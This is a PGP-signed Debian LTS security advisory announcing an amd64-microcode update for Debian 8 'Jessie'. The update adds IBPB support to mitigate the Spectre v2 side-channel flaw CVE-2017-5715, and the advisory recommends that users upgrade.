-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 Package: amd64-microcode Version: 3.20181128.1~deb8u1 CVE ID : CVE-2017-5715 Debian Bug : 886382 It was discovered that systems with microprocessors utilizing speculative execution and indirect branch prediction may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis (Spectre v2). Multiple fixes were done already in Linux kernel, intel-microcode etc. This fix adds amd-microcode-based IBPB support. For Debian 8 "Jessie", this problem has been fixed in version 3.20181128.1~deb8u1. We recommend that you upgrade your amd64-microcode package. Further information about Debian LTS security advisories, how to apply these updates to your system and frequent Regards, Anton -BEGIN PGP SIGNATURE- iQIzBAEBCgAdFiEEu71F6oGKuG/2fnKF0+Fzg8+n/wYFAl51H84ACgkQ0+Fzg8+n /wZvjw//dgFzx6McqaXwd9ydzqxrvxIXxiNU3yYQKEZ6NxTjMHSrrPBCCKWfy36d lvjzK40Krmn1Q7YSae122YWi/4Sk5S5Y3QTgGD+QHrhQ1AYoyCmbRL3t+drntvVU lCKv/3VKlLA+E9UX3w5ZKRxOHSoiIbliJ+k8q2PbgruttOX3RJLEtzv3bjUCBsmf uO5WS/fZt5ia8Qrsk8xZ4uBnF3GgmfUDVaR8Pl9oBIcesBZUqZb0mL73NoGsdIyJ vKN9h14c+3JujOgMu+GFJ8nNUl8KvLHU3RjXpIK0Ov/PiTykiZed+h2KkA07scJe gmrbOQsZa53/PJUS4/PT+Nk7UaQh9UPxb3Ipw7QfiOcHY5h17zSwipVmo3nyeftC N/3khJLQhmiwTl4ejGVcR6PEdF+Gh0Ry9K196BqXwjnsoly+HYKmEARNsVygxQlR GnN2MG+tTCZMjo6tDv8sV5Lsmmjj6/5UEATZaDxLalRRlbNpXRAAd15sxWQCCFPC FIx1xaEvlqvkqNvjtudcwDvVv/8c/vYvilzmdTz63WQrP00VPo3SVdpASuIMbBDP D38D4WtYrwUgKWPI1Vb8aiJAPNhPUzLiSzT1/rC3AZ+BmX3IiFtLXLly+33p5voo acpXt/Fh0ufCnjhsxLaTgkkdksTucmMf0JwE+bzDmWgZFq5hjLM= =HLKx -END PGP SIGNATURE-